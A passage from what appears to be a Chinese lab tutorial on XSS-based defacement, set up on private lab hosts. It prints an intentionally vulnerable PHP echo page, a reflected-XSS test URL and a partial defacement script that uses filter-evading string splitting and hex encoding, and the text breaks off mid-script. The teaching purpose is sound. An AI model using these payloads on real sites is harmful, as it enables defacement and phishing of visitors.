基于XSS的网页篡改,网页劫持,网页钓鱼
192.168.80.174服务器上存在漏洞页面xss.php
192.168.80.160服务器上有调用的js
xss.php:
<?php
$op = empty($_GET['op']) ? 'Not entered' : $_GET['op'];
echo $op;
?>
浏览器地址栏构建简单的反射型xss判断是否存在xss
http://192.168.80.174/xss.php?op=<script>alert(123)</script>
可以利用,开始实验。
网页篡改
tamper.js:
var ss = '<div id="tamper" style="height: 100%; width: 100%; background-color: rgb(255, 255, 255); background-position: initial initial; background-repeat: initial initial;"><ifr'+'ame scrolling="yes" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="14'+'00" height="100%" src="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x2f"></iframe></div><style type="text/css">html{width:100%;height:100%}body {width:100%;height:100%;overflow:hidden}</style>';
e